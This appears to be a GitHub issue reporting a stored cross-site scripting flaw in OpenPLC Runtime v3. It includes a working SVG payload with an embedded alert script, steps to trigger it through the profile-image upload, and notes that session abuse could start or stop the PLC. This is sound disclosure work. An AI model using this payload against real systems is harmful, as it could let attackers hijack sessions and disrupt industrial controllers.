search

thiagoralves / OpenPLC_v3

OpenPLC Runtime version 3
1.02k stars 421 forks source link

Vulnerability Found - Stored XSS via SVG File Upload #242

Open 1d8 opened 1 month ago

1d8 commented 1 month ago

Git: https://github.com/thiagoralves/OpenPLC_v3

Stored XSS Via Profile Image Upload

Reproduction

Use this payload & save it as image.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by 1d8");
</script>
</svg>
  1. Login > Users > Select a user to edit
  2. Upload the image.svg as the picture
  3. Save changes
  4. Right-click the profile image in upper-right hand corner > Open image in new tab

Our XSS payload is now executed

Impact

Since we can inject our own Javascript, we can abuse the user's logged in cookie to do things such as start/stop the PLC or interact with the Slave devices